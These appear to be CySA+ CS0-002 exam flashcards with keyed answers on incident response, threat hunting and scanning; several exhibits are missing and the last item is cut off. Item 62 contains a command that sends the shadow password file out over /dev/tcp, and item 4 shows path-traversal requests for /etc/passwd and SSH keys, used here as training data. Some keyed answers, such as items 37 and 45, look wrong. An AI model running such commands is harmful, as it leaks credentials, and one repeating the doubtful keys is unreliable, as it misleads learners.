CSO-002 Part 2 Flashcards

1
Q

A large software company wants to move its source control and deployment pipelines into a cloud-computing environment. Due to the nature of the business, management determines the recovery time objective needs to be within one hour. Which of the following strategies would put the company in the BEST position to achieve the desired recovery time?

A. Establish an alternate site with active replication to other regions
B. Configure a duplicate environment in the same region and load balance between both instances
C. Set up every cloud component with duplicated copies and auto-scaling turned on
D. Create a duplicate copy on premises that can be used for failover in a disaster situation

A

A. Establish an alternate site with active replication to other regions

2
Q

A cybersecurity analyst is reading a daily intelligence digest of new vulnerabilities. The type of vulnerability that should be disseminated FIRST is one that:

A. enables remote code execution that is being exploited in the wild
B. enables data leakage but is not known to be in the environment
C. enables lateral movement and was reported as a proof of concept
D. affected the organization in the past but was probably contained and eradicated

A

A. enables remote code execution that is being exploited in the wild

3
Q

A company's incident response team is handling a threat that was identified on the network. Security analysts have determined a web server is making multiple connections from TCP port 445 outbound to servers inside its subnet as well as at remote sites. Which of the following is the MOST appropriate next step in the incident response plan?

A. Quarantine the web server
B. Deploy virtual firewalls
C. Capture a forensic image of the memory and disk
D. Enable web server containerization

A

A. Quarantine the web server

4
Q

During an incident, a cybersecurity analyst found several entries in the web server logs that are related to an IP with a bad reputation. Which of the following would cause the analyst to further review the incident?

A. BadReputationIp - - [2019-04-12 10:43Z] "GET /etc/passwd" 403 1023
B. BadReputationIp - - [2019-04-12 10:43Z] "GET /index.html?src=../.ssh/id_rsa" 401 17044
C. BadReputationIp - - [2019-04-12 10:43Z] "GET /a.php?src=/etc/passwd" 403 11056
D. BadReputationIp - - [2019-04-12 10:43Z] "GET /a.php?src=../../.ssh/id_rsa" 200 15036
E. BadReputationIp - - [2019-04-12 10:43Z] "GET /favicon.ico?src=../usr/share/icons" 200 19064

A

D. BadReputationIp - - [2019-04-12 10:43Z] "GET /a.php?src=../../.ssh/id_rsa" 200 15036

5
Q

A developer wrote a script to make names and other PII data unidentifiable before loading a database export into the testing system. Which of the following describes the type of control that is being used?

A. Data encoding
B. Data masking
C. Data loss prevention
D. Data classification

A

B. Data masking

6
Q

Which of the following attacks can be prevented by using output encoding?

A. Server-side request forgery
B. Cross-site scripting
C. SQL injection
D. Command injection
E. Cross-site request forgery
F. Directory traversal

A

B. Cross-site scripting

7
Q

The help desk provided a security analyst with a screenshot of a user's desktop:

For which of the following is aircrack-ng being used?

A. Wireless access point discovery
B. Rainbow attack
C. Brute-force attack
D. PCAP data collection

A

C. Brute-force attack

8
Q

A security manager has asked an analyst to provide feedback on the results of a penetration test. After reviewing the results, the manager requests information regarding the possible exploitation of vulnerabilities. Which of the following information data points would be MOST useful for the analyst to provide to the security manager, who would then communicate the risk factors to senior management? (Choose two.)

A. Probability
B. Adversary capability
C. Attack vector
D. Impact
E. Classification
F. Indicators of compromise

A

A. Probability

D. Impact

9
Q

A security analyst has been alerted to several emails that show evidence an employee is planning malicious activities that involve employee PII on the network before leaving the organization. The security analyst's BEST response would be to coordinate with the legal department and:

A. the public relations department
B. senior leadership
C. law enforcement
D. the human resources department

A

D. the human resources department

10
Q

While preparing for an audit of information security controls in the environment, an analyst outlines a framework control that has the following requirements:
✑ All sensitive data must be classified.
✑ All sensitive data must be purged on a quarterly basis.
✑ Certificates of disposal must remain on file for at least three years.
This framework control is MOST likely classified as:

A. prescriptive
B. risk-based
C. preventive
D. corrective

A

A. prescriptive

11
Q

An analyst performs a routine scan of a host using Nmap and receives the following output:

Port 22/23/80 are open

Which of the following should the analyst investigate FIRST?

A. Port 21
B. Port 22
C. Port 23
D. Port 80

A

C. Port 23

12
Q

A security analyst at a technology solutions firm has uncovered the same vulnerabilities on a vulnerability scan for a long period of time. The vulnerabilities are on systems that are dedicated to the firm's largest client. Which of the following is MOST likely inhibiting the remediation efforts?

A. The parties have an MOU between them that could prevent shutting down the systems
B. There is a potential disruption of the vendor-client relationship
C. Patches for the vulnerabilities have not been fully tested by the software vendor
D. There is an SLA with the client that allows very little downtime

A

D. There is an SLA with the client that allows very little downtime

13
Q

A security analyst gathered forensics from a recent intrusion in preparation for legal proceedings. The analyst used EnCase to gather the digital forensics, cloned the hard drive, and took the hard drive home for further analysis. Which of the following did the security analyst violate?

A. Cloning procedures
B. Chain of custody
C. Hashing procedures
D. Virtualization

A

B. Chain of custody

14
Q

A threat feed notes malicious actors have been infiltrating companies and exfiltrating data to a specific set of domains. Management at an organization wants to know if it is a victim. Which of the following should the security analyst recommend to identify this behavior without alerting any potential malicious actors?

A. Create an IPS rule to block these domains and trigger an alert within the SIEM tool when these domains are requested.
B. Add the domains to a DNS sinkhole and create an alert in the SIEM tool when the domains are queried
C. Look up the IP addresses for these domains and search firewall logs for any traffic being sent to those IPs over port 443
D. Query DNS logs with a SIEM tool for any hosts requesting the malicious domains and create alerts based on this information

A

B. Add the domains to a DNS sinkhole and create an alert in the SIEM tool when the domains are queried

15
Q

A security analyst discovered a specific series of IP addresses that are targeting an organization. None of the attacks have been successful. Which of the following should the security analyst perform NEXT?

A. Begin blocking all IP addresses within that subnet
B. Determine the attack vector and total attack surface
C. Begin a kill chain analysis to determine the impact
D. Conduct threat research on the IP addresses

A

D. Conduct threat research on the IP addresses

16
Q

Which of the following is the MOST important objective of a post-incident review?

A. Capture lessons learned and improve incident response processes
B. Develop a process for containment and continue improvement efforts
C. Identify new technologies and strategies to remediate
D. Identify a new management strategy

A

A. Capture lessons learned and improve incident response processes

17
Q

An organization was alerted to a possible compromise after its proprietary data was found for sale on the Internet. An analyst is reviewing the logs from the next-generation UTM in an attempt to find evidence of this breach. Given the following output:

Which of the following should be the focus of the investigation?

A. webserver.org-dmz.org
B. sftp.org-dmz.org
C. 83hht23.org-int.org
D. ftps.bluemed.net

A

A. webserver.org-dmz.org

18
Q

A company wants to establish a threat-hunting team. Which of the following BEST describes the rationale for integrating intelligence into hunt operations?

A. It enables the team to prioritize the focus areas and tactics within the company's environment
B. It provides criticality analyses for key enterprise servers and services
C. It allows analysts to receive routine updates on newly discovered software vulnerabilities
D. It supports rapid response and recovery during and following an incident

A

A. It enables the team to prioritize the focus areas and tactics within the company's environment

19
Q

A security analyst is investigating a compromised Linux server. The analyst issues the ps command and receives the following output:

Which of the following commands should the administrator run NEXT to further analyze the compromised system?

A. strace /proc/1301
B. rpm -V openssh-server
C. /bin/ls -l /proc/1301/exe
D. kill -9 1301

A

A. strace /proc/1301

20
Q

A security analyst is reviewing the following log entries to identify anomalous activity:

Which of the following attack types is occurring?

A. Directory traversal
B. SQL injection
C. Buffer overflow
D. Cross-site scripting

A

A. Directory traversal

21
Q

A web-based front end for a business intelligence application uses pass-through authentication to authenticate users. The application then uses a service account to perform queries and look up data in a database. A security analyst discovers employees are accessing data sets they have not been authorized to use. Which of the following will fix the cause of the issue?

A. Change the security model to force the users to access the database as themselves
B. Parameterize queries to prevent unauthorized SQL queries against the database
C. Configure database security logging using syslog or a SIEM
D. Enforce unique session IDs so users do not get a reused session ID

A

A. Change the security model to force the users to access the database as themselves

22
Q

A company's Chief Information Security Officer (CISO) is concerned about the integrity of some highly confidential files. Any changes to these files must be tied back to a specific authorized user's activity session. Which of the following is the BEST technique to address the CISO's concerns?

A. Configure DLP to reject all changes to the files without pre-authorization. Monitor the files for unauthorized changes.
B. Regularly use SHA-256 to hash the directory containing the sensitive information. Monitor the files for unauthorized changes.
C. Place a legal hold on the files. Require authorized users to abide by a strict time context access policy. Monitor the files for unauthorized changes.
D. Use Wireshark to scan all traffic to and from the directory. Monitor the files for unauthorized changes.

A

A. Configure DLP to reject all changes to the files without pre-authorization. Monitor the files for unauthorized changes.

23
Q

Which of the following secure coding techniques can be used to prevent cross-site request forgery attacks?

A. Input validation
B. Output encoding
C. Parameterized queries
D. Tokenization

A

D. Tokenization

24
Q

A security analyst scanned an internal company subnet and discovered a host with the following Nmap output.

Based on the output of this Nmap scan, which of the following should the analyst investigate FIRST?

A. Port 22
B. Port 135
C. Port 445
D. Port 3389

A

A. Port 22

25
Q

Which of the following technologies can be used to store digital certificates and is typically used in high-security implementations where integrity is paramount?

A. HSM
B. eFuse
C. UEFI
D. Self-encrypting drive

A

A. HSM

26
Q

A security analyst is investigating a malware infection that occurred on a Windows system. The system was not connected to a network and had no wireless capability. Company policy prohibits using portable media or mobile storage. The security analyst is trying to determine which user caused the malware to get onto the system. Which of the following registry keys would MOST likely have this information?

A. HKEY_USERS\Software\Microsoft\Windows\CurrentVersion\Run
B. HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Run
C. HKEY_USERS\Software\Microsoft\Windows\explorer\MountPoints2
D. HKEY_USERS\Software\Microsoft\Internet Explorer\Typed URLs
E. HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\eventlog\System\iusb3hub

A

E. HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\eventlog\System\iusb3hub

27
Q

Clients are unable to access a company's API to obtain pricing data. An analyst discovers sources other than clients are scraping the API for data, which is causing the servers to exceed available resources. Which of the following would be BEST to protect the availability of the APIs?

A. IP whitelisting
B. Certificate-based authentication
C. Virtual private network
D. Web application firewall

A

D. Web application firewall

28
Q

A security analyst recently discovered two unauthorized hosts on the campus's wireless network segment from a man-in-the-middle attack. The security analyst also verified that privileges were not escalated, and the two devices did not gain access to other network devices. Which of the following would BEST mitigate and improve the security posture of the wireless network for this type of attack?

A. Enable MAC filtering on the wireless router and suggest a stronger encryption for the wireless network
B. Change the SSID, strengthen the passcode, and implement MAC filtering on the wireless router
C. Enable MAC filtering on the wireless router and create a whitelist that allows devices on the network
D. Conduct a wireless survey to determine if the wireless strength needs to be reduced

A

A. Enable MAC filtering on the wireless router and suggest a stronger encryption for the wireless network

29
Q

Given the Nmap request below:

Which of the following actions will an attacker be able to initiate directly against this host?

A. Password sniffing
B. ARP spoofing
C. A brute-force attack
D. An SQL injection

A

C. A brute-force attack

30
Q

As part of an organization's information security governance process, a Chief Information Security Officer (CISO) is working with the compliance officer to update policies to include statements related to new regulatory and legal requirements. Which of the following should be done to BEST ensure all employees are appropriately aware of changes to the policies?

A. Conduct a risk assessment based on the controls defined in the newly revised policies
B. Require all employees to attend updated security awareness training and sign an acknowledgement
C. Post the policies on the organization's intranet and provide copies of any revised policies to all active vendors
D. Distribute revised copies of policies to employees and obtain a signed acknowledgement from them

A

B. Require all employees to attend updated security awareness training and sign an acknowledgement

31
Q

During an investigation, an analyst discovers the following rule in an executive's email client:
IF * TO THEN mailto:
SELECT FROM 'sent' THEN DELETE FROM
The executive is not aware of this rule. Which of the following should the analyst do FIRST to evaluate the potential impact of this security incident?

A. Check the server logs to evaluate which emails were sent to
B. Use the SIEM to correlate logging events from the email server and the domain server
C. Remove the rule from the email client and change the password
D. Recommend that management implement SPF and DKIM

A

A. Check the server logs to evaluate which emails were sent to

32
Q

A critical server was compromised by malware, and all functionality was lost. Backups of this server were taken; however, management believes a logic bomb may have been injected by a rootkit. Which of the following should a security analyst perform to restore functionality quickly?

A. Work backward, restoring each backup until the server is clean
B. Restore the previous backup and scan with a live boot anti-malware scanner
C. Stand up a new server and restore critical data from backups
D. Offload the critical data to a new server and continue operations

A

C. Stand up a new server and restore critical data from backups

33
Q

An analyst wants to identify hosts that are connecting to the external FTP servers and what, if any, passwords are being used. Which of the following commands should the analyst use?

A. tcpdump -X dst port 21
B. ftp ftp.server -p 21
C. nmap -o ftp.server -p 21
D. telnet ftp.server 21

A

A. tcpdump -X dst port 21

34
Q

An incident response team is responding to a breach of multiple systems that contain PII and PHI. Disclosing the incident to external entities should be based on:

A. the responder's discretion
B. the public relations policy
C. the communication plan
D. senior management's guidance

A

C. the communication plan

35
Q

A security analyst is responding to an incident on a web server on the company network that is making a large number of outbound requests over DNS. Which of the following is the FIRST step the analyst should take to evaluate this potential indicator of compromise?

A. Run an anti-malware scan on the system to detect and eradicate the current threat
B. Start a network capture on the system to look into the DNS requests to validate command and control traffic
C. Shut down the system to prevent further degradation of the company network
D. Reimage the machine to remove the threat completely and get back to a normal running state
E. Isolate the system on the network to ensure it cannot access other systems while evaluation is underway

A

B. Start a network capture on the system to look into the DNS requests to validate command and control traffic

36
Q

A security analyst needs to assess the web server versions on a list of hosts to determine which are running a vulnerable version of the software and output that list into an XML file named webserverlist.xml. The host list is provided in a file named webserverlist.txt. Which of the following Nmap commands would BEST accomplish this goal?

A. nmap -iL webserverlist.txt -sC -p 443 -oX webserverlist.xml
B. nmap -iL webserverlist.txt -sV -p 443 -oX webserverlist.xml
C. nmap -iL webserverlist.txt -F -p 443 -oX webserverlist.xml
D. nmap --takefile webserverlist.txt --outputfileasXML webserverlist.xml --scanports 443

A

B. nmap -iL webserverlist.txt -sV -p 443 -oX webserverlist.xml

-sV is for version detection

37
Q

Which of the following session management techniques will help to prevent a session identifier from being stolen via an XSS attack?

A. Ensuring the session identifier length is sufficient
B. Creating proper session identifier entropy
C. Applying a secure attribute on session cookies
D. Utilizing transport layer encryption on all requests
E. Implementing session cookies with the HttpOnly flag

A

B. Creating proper session identifier entropy

38
Q

The Chief Executive Officer (CEO) of a large insurance company has reported phishing emails that contain malicious links are targeting the entire organization. Which of the following actions would work BEST to prevent against this type of attack?

A. Turn on full behavioral analysis to avert an infection.
B. Implement an EDR mail module that will rewrite and analyze email links.
C. Reconfigure the EDR solution to perform real-time scanning of all files.
D. Ensure EDR signatures are updated every day to avert infection.
E. Modify the EDR solution to use heuristic analysis techniques for malware.

A

B. Implement an EDR mail module that will rewrite and analyze email links.

39
Q

Which of the following sources would a security analyst rely on to provide relevant and timely threat information concerning the financial services industry?

A. Real-time and automated firewall rules subscriptions
B. Open-source intelligence, such as social media and blogs
C. Information sharing and analysis membership
D. Common vulnerability and exposure bulletins

A

C. Information sharing and analysis membership

40
Q

The Chief Information Officer (CIO) for a large manufacturing organization has noticed a significant number of unknown devices with possible malware infections are on the organization’s corporate network. Which of the following would work BEST to prevent the issue?

A. Reconfigure the NAC solution to prevent access based on a full device profile and ensure antivirus is installed.
B. Segment the network to isolate all systems that contain highly sensitive information, such as intellectual property.
C. Implement certificate validation on the VPN to ensure only employees with the certificate can access the company network.
D. Update the antivirus configuration to enable behavioral and real-time analysis on all systems within the network.

A

A. Reconfigure the NAC solution to prevent access based on a full device profile and ensure antivirus is installed.

41
Q

A security analyst recently used Arachni to perform a vulnerability assessment of a newly developed web application. The analyst is concerned about the following output:

Which of the following is the MOST likely reason for this vulnerability?

A. The developer set input validation protection on the specific field of search.aspx.
B. The developer did not set proper cross-site scripting protections in the header.
C. The developer did not implement default protections in the web application build.
D. The developer did not set proper cross-site request forgery protections.

A

A. The developer set input validation protection on the specific field of search.aspx.

42
Q

A Chief Security Officer (CSO) is working on the communication requirements for an organization’s incident response plan. In addition to technical response activities, which of the following is the main reason why communication must be addressed in an effective incident response program?

A. Public relations must receive information promptly in order to notify the community.
B. Improper communications can create unnecessary complexity and delay response actions.
C. Organizational personnel must only interact with trusted members of the law enforcement community.
D. Senior leadership should act as the only voice for the incident response team when working with forensics teams.

A

B. Improper communications can create unnecessary complexity and delay response actions.

43
Q

An information security analyst discovered a virtual machine server was compromised by an attacker. Which of the following should be the FIRST step to confirm and respond to the incident?

A. Pause the virtual machine.
B. Shut down the virtual machine.
C. Take a snapshot of the virtual machine.
D. Remove the NIC from the virtual machine.

A

A. Pause the virtual machine

44
Q

A custom script currently monitors real-time logs of a SAML authentication server to mitigate brute-force attacks. Which of the following is a concern when moving authentication to a cloud service?

A. Logs may contain incorrect information.
B. SAML logging is not supported for cloud-based authentication.
C. Access to logs may be delayed for some time.
D. Log data may be visible to other customers.

A

C. Access to logs may be delayed for some time.

45
Q

During a review of vulnerability scan results, an analyst determines the results may be flawed because a control-baseline system, which is used to evaluate a scanning tool's effectiveness, was reported as not vulnerable. Consequently, the analyst verifies the scope of the scan included the control-baseline host, which was available on the network during the scan. The use of a control-baseline endpoint in this scenario assists the analyst in confirming:

A. verification of mitigation.
B. false positives.
C. false negatives.
D. the criticality index.
E. hardening validation.

A

A. verification of mitigation.

46
Q

An analyst is reviewing the following code output of a vulnerability scan:

Which of the following types of vulnerabilities does this MOST likely represent?

A. A XSS vulnerability
B. An HTTP response split vulnerability
C. A credential bypass vulnerability
D. A carriage-return, line-feed vulnerability

A

A. A XSS vulnerability

47
Q

The threat intelligence department recently learned of an advanced persistent threat that is leveraging a new strain of malware, exploiting a system router. The company currently uses the same device mentioned in the threat report. Which of the following configuration changes would BEST improve the organization's security posture?

A. Implement an IPS rule that contains content for the malware variant and patch the routers to protect against the vulnerability
B. Implement an IDS rule that contains the IP addresses from the advanced persistent threat and patch the routers to protect against the vulnerability
C. Implement an IPS rule that contains the IP addresses from the advanced persistent threat and patch the routers to protect against the vulnerability
D. Implement an IDS rule that contains content for the malware variant and patch the routers to protect against the vulnerability

A

A. Implement an IPS rule that contains content for the malware variant and patch the routers to protect against the vulnerability

48
Q

An analyst is searching a log for potential credit card leaks. The log stores all data encoded in hexadecimal. Which of the following commands will allow the security analyst to confirm the incident?

A. cat log |xxd -r -p | egrep -v '[0-9]{16}'
B. egrep '(3[0-9]){16}' log
C. cat log |xxd -r -p | egrep '[0-9]{16}'
D. egrep '[0-9]{16}' log |xxd

A

C. cat log |xxd -r -p | egrep '[0-9]{16}'

49
Q

This is a Simulation

A

REVIEW!

50
Q

A company's senior human resources administrator left for another position, and the assistant administrator was promoted into the senior position. On the official start day, the new senior administrator planned to ask for extended access permissions but noticed the permissions were automatically granted on that day. Which of the following describes the access management policy in place at the company?

A. Mandatory-based
B. Host-based
C. Federated access
D. Role-based

A

D. Role-based

51
Q

The steering committee for information security management annually reviews the security incident register for the organization to look for trends and systematic issues. The steering committee wants to rank the risks based on past incidents to improve the security program for next year. Below is the incident register for the organization:

Which of the following should the organization consider investing in FIRST due to the potential impact of availability?

A. Hire a managed service provider to help with vulnerability management
B. Build a warm site in case of system outages
C. Invest in a failover and redundant system, as necessary
D. Hire additional staff for the IT department to assist with vulnerability management and log review

A

C. Invest in a failover and redundant system, as necessary

52
Q

A security analyst reviews a recent network capture and notices encrypted inbound traffic on TCP port 465 was coming into the company's network from a database server. Which of the following will the security analyst MOST likely identify as the reason for the traffic on this port?

A. The traffic is common static data that Windows servers send to Microsoft
B. Someone has configured an unauthorized SMTP application over SSL
C. A connection from the database to the web front end is communicating on the port
D. The server is receiving a secure connection using the new TLS 1.3 standard

A

B. Someone has configured an unauthorized SMTP application over SSL

53
Q

SIMULATION

A

REVIEW

54
Q

An organization wants to move non-essential services into a cloud computing environment. Management has a cost focus and would like to achieve a recovery time objective of 12 hours. Which of the following cloud recovery strategies would work BEST to attain the desired outcome?

A. Duplicate all services in another instance and load balance between the instances
B. Establish a hot site with active replication to another region within the same cloud provider
C. Set up a warm disaster recovery site with the same cloud provider in a different region
D. Configure the systems with a cold site at another cloud provider that can be used for failover

A

C. Set up a warm disaster recovery site with the same cloud provider in a different region

55
Q

A threat intelligence analyst has received multiple reports that are suspected to be about the same advanced persistent threat. To which of the following steps in the intelligence cycle would this map?

A. Dissemination
B. Analysis
C. Feedback
D. Requirements
E. Collection

A

E. Collection

56
Q

During an incident investigation, a security analyst acquired a malicious file that was used as a backdoor but was not detected by the antivirus application. After performing a reverse-engineering procedure, the analyst found that part of the code was obfuscated to avoid signature detection. Which of the following types of instructions should the analyst use to understand how the malware was obfuscated and to help deobfuscate it?

A. MOV
B. ADD
C. XOR
D. SUB
E. MOVL

A

C. XOR

57
Q

An organization has several systems that require specific logons. Over the past few months, the security analyst has noticed numerous failed logon attempts followed by password resets. Which of the following should the analyst do to reduce the occurrence of legitimate failed logons and password resets?

A. Use SSO across all applications
B. Perform a manual privilege review
C. Adjust the current monitoring and logging rules
D. Implement multifactor authentication

A

A. Use SSO across all applications

58
Q

An application server runs slowly and then triggers a high CPU alert. After investigating, a security analyst finds an unauthorized program is running on the server.
The analyst reviews the application log below.

Which of the following conclusions is supported by the application log?

A. An attacker was attempting to perform a DoS attack against the server
B. An attacker was attempting to download files via a remote command execution vulnerability
C. An attacker was attempting to perform a buffer overflow attack to execute a payload in memory
D. An attacker was attempting to perform an XSS attack via a vulnerable third-party library

A

B. An attacker was attempting to download files via a remote command execution vulnerability

59
Q

A security analyst is reviewing the following requirements for new time clocks that will be installed in a shipping warehouse:
✑ The clocks must be configured so they do not respond to ARP broadcasts.
✑ The server must be configured with static ARP entries for each clock.

Which of the following types of attacks will this configuration mitigate?

A. Spoofing
B. Overflows
C. Rootkits
D. Sniffing

A

A. Spoofing

Static ARP entries = anti-spoofing

60
Q

A security analyst is attempting to utilize the following threat intelligence for developing detection capabilities:
APT X's approach to a target would be sending a phishing email to the target after conducting active and passive reconnaissance. Upon successful compromise, APT X conducts internal reconnaissance and attempts to move laterally by utilizing existing resources. When APT X finds data that aligns to its objectives, it stages and then exfiltrates data sets in sizes that can range from 1GB to 5GB. APT X also establishes several backdoors to maintain a C2 presence in the environment.

In which of the following phases is this APT MOST likely to leave discoverable artifacts?

A. Data collection/exfiltration
B. Defensive evasion
C. Lateral movement
D. Reconnaissance

A

A. Data collection/exfiltration

SIEM will detect data spikes

61
Q

A security analyst is scanning the network to determine if a critical security patch was applied to all systems in an enterprise. The organization has a very low tolerance for risk when it comes to resource availability. Which of the following is the BEST approach for configuring and scheduling the scan?

A. Make sure the scan is credentialed, covers all hosts in the patch management system, and is scheduled during business hours so it can be terminated if it affects business operations.
B. Make sure the scan is uncredentialed, covers all hosts in the patch management system, and is scheduled during off-business hours so it has the least impact on operations.
C. Make sure the scan is credentialed, has the latest software and signature versions, covers all hosts in the patch management system, and is scheduled during off-business hours so it has the least impact on operations.
D. Make sure the scan is credentialed, uses a limited plugin set, scans all host IP addresses in the enterprise, and is scheduled during off-business hours so it has the least impact on operations.

A

D. Make sure the scan is credentialed, uses a limited plugin set, scans all host IP addresses in the enterprise, and is scheduled during off-business hours so it has the least impact on operations.

62
Q

During a routine log review, a security analyst has found the following commands that cannot be identified from the Bash history log on the root user:

Line 1 logger keeping track of my activity
Line 2 tail -1 /vvar/log/syslog
Line 3 lvextend -L +50G /dev/volg1/secret
Line 4 rm -rf1 /tmp/DFt5Gsd3
Line 5 cat /etc/s*w > /dev/tcp/10.0.0.1/8080
Line 6 yum install httpd --assumeyes

Which of the following commands should the analyst investigate FIRST?

A. Line 1
B. Line 2
C. Line 3
D. Line 4
E. Line 5
F. Line 6

A

E. Line 5

63
Q

A security analyst is probing a company's public-facing servers for vulnerabilities and obtains the following output:

Which of the following changes should the analyst recommend FIRST?

A. Implement File Transfer Protocol Secure on the upload server
B. Disable anonymous login on the web server
C. Configure firewall changes to close port 445 on 124.45.23.112
D. Apply a firewall rule to filter the number of requests per second on port 80 on 124.45.23.108

A

C. Configure firewall changes to close port 445 on 124.45.23.112

64
Q

While reviewing log files, a security analyst uncovers a brute-force attack that is being performed against an external webmail portal. Which of the following would be BEST to prevent this type of attack from being successful?

A. Create a new rule in the IDS that triggers an alert on repeated login attempts
B. Implement MFA on the email portal using out-of-band code delivery
C. Alter the lockout policy to ensure users are permanently locked out after five attempts
D. Leverage password filters to prevent weak passwords on employee accounts from being exploited
E. Configure a WAF with brute-force protection rules in block mode

A

B. Implement MFA on the email portal using out-of-band code delivery

65
Q

A security analyst reviews SIEM logs and detects a well-known malicious executable running in a Windows machine. The up-to-date antivirus cannot detect the malicious executable. Which of the following is the MOST likely cause of this issue?

A. The malware is fileless and exists only in physical memory
B. The malware detects and prevents its own execution in a virtual environment
C. The antivirus does not have the malware's signature
D. The malware is being executed with administrative privileges

A

A. The malware is fileless and exists only in physical memory

66
Q

A security engineer is reviewing security products that identify malicious actions by users as part of a company's insider threat program. Which of the following is the MOST appropriate product category for this purpose?

A. SCAP
B. SOAR
C. UEBA
D. WAF

A

C. UEBA

67
Q

A large organization wants to move account registration services to the cloud to benefit from faster processing and elasticity. Which of the following should be done FIRST to determine the potential risk to the organization?

A. Establish a recovery time objective and a recovery point objective for the systems being moved
B. Calculate the resource requirements for moving the systems to the cloud
C. Determine recovery priorities for the assets being moved to the cloud-based systems
D. Identify the business processes that will be migrated and the criticality of each one
E. Perform an inventory of the servers that will be moving and assign priority to each one

A

D. Identify the business processes that will be migrated and the criticality of each one

68
Q

A security analyst is reviewing the following DNS logs as part of security-monitoring activities:

Which of the following MOST likely occurred?

A. The attack used an algorithm to generate command and control information dynamically
B. The attack attempted to contact www.google.com to verify Internet connectivity
C. The attack used encryption to obfuscate the payload and bypass detection by an IDS
D. The attack caused an internal host to connect to a command and control server

A

D. The attack caused an internal host to connect to a command and control server

69
Q

A security analyst is required to stay current with the most recent threat data and intelligence reports. When gathering data, it is MOST important for the data to be:

A. proprietary and timely
B. proprietary and accurate
C. relevant and deep
D. relevant and accurate

A

D. relevant and accurate

70
Q

As a proactive threat-hunting technique, hunters must develop situational cases based on likely attack scenarios derived from the available threat intelligence information. After forming the basis of the scenario, which of the following may the threat hunter construct to establish a framework for threat assessment?

A. Critical asset list
B. Threat vector
C. Attack profile
D. Hypothesis

A

D. Hypothesis

71
Q

Employees of a large financial company are continuously being infected by strands of malware that are not detected by EDR tools. Which of the following is the
BEST security control to implement to reduce corporate risk while allowing employees to exchange files at client sites?

A. MFA on the workstations
B. Additional host firewall rules
C. VDI environment
D. Hard drive encryption
E. Network access control
F. Network segmentation

A

C. VDI environment

72
Q

An executive assistant wants to onboard a new cloud-based product to help with business analytics and dashboarding. Which of the following would be the BEST integration option for this service?

A. Manually log in to the service and upload data files on a regular basis
B. Have the internal development team script connectivity and file transfers to the new service
C. Create a dedicated SFTP site and schedule transfers to ensure file transport security
D. Utilize the cloud product's API for supported and ongoing integrations

A

D. Utilize the cloud product's API for supported and ongoing integrations

73
Q

A security analyst received a series of antivirus alerts from a workstation segment, and users reported ransomware messages. During lessons-learned activities, the analyst determines the antivirus was able to alert to abnormal behavior but did not stop this newest variant of ransomware. Which of the following actions should be taken to BEST mitigate the effects of this type of threat in the future?

A. Enabling sandboxing technology
B. Purchasing cyber insurance
C. Enabling application blacklisting
D. Installing a firewall between the workstations and Internet

A

A. Enabling sandboxing technology

74
Q

A bad actor bypasses authentication and reveals all records in a database through an SQL injection. Implementation of which of the following would work BEST to prevent similar attacks in the future?

A. Strict input validation
B. Blacklisting
C. SQL patching
D. Content filtering
E. Output encoding

A

A. Strict input validation

75
Q

A cybersecurity analyst is dissecting an intrusion down to the specific techniques and wants to organize them in a logical manner. Which of the following frameworks would BEST apply in this situation?

A. Pyramid of Pain
B. MITRE ATT&CK
C. Diamond Model of Intrusion Analysis
D. CVSS v3.0

A

B. MITRE ATT&CK

76
Q

An organization used a third party to conduct a security audit and discovered several deficiencies in the cybersecurity program. The findings noted many external vulnerabilities that were not caught by the vulnerability scanning software, numerous weaknesses that allowed lateral movement, and gaps in monitoring that did not detect the activity of the auditors. Based on these findings, which of the following would be the BEST long-term enhancement to the security program?

A. Quarterly external penetration testing
B. Monthly tabletop scenarios
C. Red-team exercises
D. Audit exercise

A

D. Audit exercise

77
Q

An information security analyst on a threat-hunting team is working with administrators to create a hypothesis related to an internally developed web application.
The working hypothesis is as follows:
✑ Due to the nature of the industry, the application hosts sensitive data associated with many clients and is a significant target.
✑ The platform is most likely vulnerable to poor patching and inadequate server hardening, which expose vulnerable services.
✑ The application is likely to be targeted with SQL injection attacks due to the large number of reporting capabilities within the application.
As a result, the systems administrator upgrades outdated service applications and validates the endpoint configuration against an industry benchmark. The analyst suggests developers receive additional training on implementing identity and access management, and also implements a WAF to protect against SQL injection attacks. Which of the following BEST represents the technique in use?

A. Improving detection capabilities
B. Bundling critical assets
C. Profiling threat actors and activities
D. Reducing the attack surface area

A

D. Reducing the attack surface area

78
Q

A security analyst working in the SOC recently discovered instances in which hosts visited a specific set of domains and IPs and became infected with malware.
Which of the following is the MOST appropriate action to take in this situation?

A. Implement an IPS signature for the malware and update the blacklisting for the associated domains and IPs
B. Implement an IPS signature for the malware and another signature request to block all the associated domains and IPs
C. Implement a change request to the firewall setting to not allow traffic to and from the IPs and domains
D. Implement an IPS signature for the malware and a change request to the firewall setting to not allow traffic to and from the origin IPs subnets and second-level domains

A

D. Implement an IPS signature for the malware and a change request to the firewall setting to not allow traffic to and from the origin IPs subnets and second-level domains

79
Q

The help desk notified a security analyst that emails from a new email server are not being sent out. The new email server was recently added to the existing ones. The analyst runs the following command on the new server:

Given the output, which of the following should the security analyst check NEXT?

A. The DNS name of the new email server
B. The version of SPF that is being used
C. The IP address of the new email server
D. The DMARC policy

A

C. The IP address of the new email server

80
Q

Which of the following should a database administrator implement to BEST protect data from an untrusted server administrator?

A. Data deidentification
B. Data encryption
C. Data masking
D. Data minimization

A

B. Data encryption

81
Q

A forensic analyst took an image of a workstation that was involved in an incident. To BEST ensure the image is not tampered with, the analyst should use:

A. hashing
B. backup tapes
C. a legal hold
D. chain of custody

A

A. hashing

82
Q

An organization wants to mitigate against risks associated with network reconnaissance. ICMP is already blocked at the firewall; however, a penetration testing team has been able to perform reconnaissance against the organization's network and identify active hosts. An analyst sees the following output from a packet capture:

Which of the following phrases from the output provides information on how the testing team is successfully getting around the ICMP firewall rule?

A. flags=RA indicates the testing team is using a Christmas tree attack
B. ttl=64 indicates the testing team is setting the time to live below the firewall's threshold
C. 0 data bytes indicates the testing team is crafting empty ICMP packets
D. NO FLAGS are set indicates the testing team is using hping

A

D. NO FLAGS are set indicates the testing team is using hping

83
Q

A security analyst is investigating malicious traffic from an internal system that attempted to download proxy avoidance as identified from the firewall logs, but the destination IP is blocked and not captured. Which of the following should the analyst do?

A. Shut down the computer
B. Capture live data using Wireshark
C. Take a snapshot
D. Determine if DNS logging is enabled
E. Review the network logs

A

D. Determine if DNS logging is enabled

84
Q

An organization is assessing risks so it can prioritize its mitigation actions. Following are the risks and their probability and impact:

